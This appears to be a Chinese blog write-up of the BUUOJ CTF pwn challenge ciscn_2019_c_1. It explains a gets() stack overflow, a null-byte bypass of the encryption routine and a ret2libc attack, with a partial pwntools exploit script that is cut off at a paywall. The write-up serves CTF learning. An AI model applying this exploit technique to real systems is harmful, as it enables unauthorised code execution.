CTF buuoj pwn-----第7题:ciscn_2019_c_1

最新推荐文章于 2025-11-30 20:25:20 发布
原创 最新推荐文章于 2025-11-30 20:25:20 发布 · 917 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #安全漏洞 #反汇编 #安全

本文详细解析了CTFbuuojpwn第7题的解题过程,包括使用checksec检查保护机制、IDA静态分析、利用栈溢出实现ret2libc攻击并最终获得flag。

CTF buuoj pwn-----第7题:ciscn_2019_c_1

前言

重新梳理记录一下这道题的解题过程.

1.checksec

还是先看一下保护:

bing@bing-virtual-machine:~/pwn$ checksec ./ciscn_2019_c_1
[*] '/home/bing/pwn/ciscn_2019_c_1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

只有开启了栈不可以执行.
这就只能调用系统自身函数 或者 libc函数了
随手运行一下:

pwndbg> r
Starting program: /home/bing/pwn/ciscn_2019_c_1 

EEEEEEE                            hh      iii                
EE      mm mm mmmm    aa aa   cccc hh          nn nnn    eee  
EEEEE   mmm  mm  mm  aa aaa cc     hhhhhh  iii nnn  nn ee   e 
EE      mmm  mm  mm aa  aaa cc     hh   hh iii nn   nn eeeee  
EEEEEEE mmm  mm  mm  aaa aa  ccccc hh   hh iii nn   nn  eeeee 
====================================================================
Welcome to this Encryption machine

====================================================================
1.Encrypt
2.Decrypt
3.Exit
Input your choice!

2. IDA 静态分析

查看整个文件, 没有找到后门函数
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

幸运的是,我们在int encrypt()函数里面第10行找到了gets函数, 明显存在栈溢出.

3. 解题思路

  • eelf文件中没有system函数, 这就要用ret2libc方法 来调用libc中的system(‘bin/sh’) 函数.
  • 从11行到33行是encrypt函数的加密过程,它会对我们输入的字符串进行操作,为了保证我们构造的rop不会被破坏,要想办法绕过加密,14行的if判断里有个strlen函数,strlen的作用是得知字符串的长度,但是遇到’\0‘就会停止,所以我们在构造rop的时候可以在字符串前加上’\0‘来绕过加密.
  • 怎么获取lib.c的基地址 ?
    encrypt()里面的get()可以溢出,栈大小为50h。puts()可以用来泄露libc基址,本题我选用了__libc_start_main函数泄露libc的基地址其实都一样
  • 构造payload:
    • payload_1 :
      在这里插入图片描述
    • payload_2 (右侧):
      在这里插入图片描述

4. 编写EXP

from pwn import *

from LibcSearcher import *


context(os='linux', arch='amd64', log_level='debug')

sh = remote('node4.buuoj.cn', 25077)  

elf=ELF('./ciscn_2019_c_1') 


pop_rid_addr = 0x400c83  

ret_addr = 0x4006b9

# 通过ROPgadget 找到


__libc_start_main_addr_got = elf.got['__libc_start_main']

puts_addr_plt = elf.plt['puts']

main_addr = elf.sym['main']


payload_1 = b'\0'+b'a'*(0x50-1+8) + p64(pop_rid_addr)+ p64(__libc_start_main_addr_got)+ p64(puts_addr_plt)+ p64(main_addr)


sh.recvuntil(b'choice!\n')

sh.sendline(b'1')

sh.recvuntil(b'encrypted\n')

sh.sendline(payload_1)



sh.recvuntil(b'Ciphertext\n')

sh.recvuntil(b'\n')   

# 这一行就收到了我们想要的地址:_libc_start_main_address

__libc_start_main_address = u64(sh.recvuntil(b'\n')[:-
最低0.47元/天 解锁文章
BUUCTF ciscn_2019_c_1
红叶的博客
10-30 967
RELRO 是一种用于加强对 Binary 数据段的保护的技术。由 CPU 提供支持,在页表中有Non-executable flag, 来限制一块内存区域不可执行。IDA Pro中查看的大小有时候可能是错误的,大部分时间以gdb动态调试为准。把加密后的文本复制到新建文本文档中,查询RBP的前4个字符。远程调试使用 libc 0 ,本地调试使用 libc 1。64位ELF,开启了部分RELRO以及NX。32位和64位程序在函数调用的方式存在区别。不止这种方法可以获取大小,还有两种方法。84 - 4 即可。
ciscn_2019_c_1
2301_80245691的博客
09-18 737
本文分析了CTFciscn_2019_c_1的解过程。通过IDA逆向发现程序存在加密函数,但可利用\x00截断绕过加密。解思路分为两部分:首先构造ROP链泄露puts函数地址,计算libc基址;然后利用基址获取system和/bin/sh地址,再次构造ROP链执行system('/bin/sh')获取shell。文中详细说明了payload构造方法,包括关键gadget使用、地址泄露和解析过程,并提供了完整利用代码。最终成功获取flag,展示了如何通过ROP技术绕过保护机制实现任意代码执行。
buuctf-ciscn_2019_c_1
最新发布
hanjinming110的博客
11-30 740
本文分析了CTFciscn_2019_c_1的64位ELF程序,该程序开启了NX保护。通过IDA静态分析发现程序存在gets函数栈溢出漏洞,s数组长度为0x50,通过填充\x00绕过strlen检查。由于缺少直接可利用的system函数,采用ret2libc攻击方式:首先构造ROP链泄露puts函数地址,计算libc基址;然后二次攻击获取system和/bin/sh地址完成提权。文中详细说明了64位程序传参规则、栈对齐问解决方案,并提供了完整的Python漏洞利用脚本,包含地址计算、payload构造
CTF---密码学入门第七 杯酒人生
weixin_34050427的博客
11-02 242
杯酒人生分值:10 来源: Veneno 难度:易 参与人数:2633人 Get Flag:790人 答人数:963人 解通过率:82% 使用古典密码 一喵星人要想喵星发送一段不知道干什么用的密码“BLOCKCIPHERDESIGNPRINCIPLE”, 但是它忘记了密钥是什么, 手头(爪头)只有它自己加密过的密钥“HTRUZYJW”, 而且它 ...
CTF buuoj pwn-----第4:ciscn_2019_n_1
bing_Max的博客
08-29 811
CTF buuoj pwn-----第4:ciscn_2019_n_1前言一. checkesc ,检测文件的保护机制二. 静态分析,IDA打开文件 前言 记录一下pwn的过程 同第1、2、3一样,新手学习日记,流水线记录. 打开目, 连接靶机,下载文件ciscn_2019_n_1 一. checkesc ,检测文件的保护机制 bing@bing-virtual-machine:~/pwn$ checksec ciscn_2019_n_1 [*] '/home/bing/pwn/cisc
CTF buuoj pwn-----12: ciscn_2019_s_3
bing_Max的博客
10-09 1776
函数分析 编写exp from pwn import * sh = remote('node4.buuoj.cn', 27939) context(arch='amd64',os='linux', log_level='debug') main_addr= 0x4004ED # 这里其实是vuln的地址, main地址会错:timeout: the monitored command dumped core payload_1 = b'/bin/sh\x00' + b'a'*0x8 + p.
BUU CTF ciscn_2019_n_1
A_fish_like_sing的博客
03-20 2132
新手向对BUU CTF ciscn_2019_n_1的两种解法
CTF-PWN-buuctf-ciscn_2019_c_1-ret2libc的典型使用
serfend's blog
04-15 2601
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1ENhfN3jAV0TAUKpEIeZ7zw?pwd=2n64 提取码:2n64 答案:flag{e8165d23-782e-47fd-9c16-0a002b1f08bd} 总体思路 发现加密位置,判断其溢出点 通过设置第一个字符为\0以让strlen返回0,从而避免payload被破坏 构造执行,溢出获取puts的地址,从而得到libc版本 再次溢出,执行获取sh
axis-1_4:实用自动生成功能,探索新境界
CTF是一种信息安全竞赛,通常包含一系列的挑战目,每都关联着一些对特定技能的测试,比如密码分析、二进制分析、Web应用安全、逆向工程、网络取证等。尽管CTF竞赛通常不直接关联到Axis工具,但是在这里“类似于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值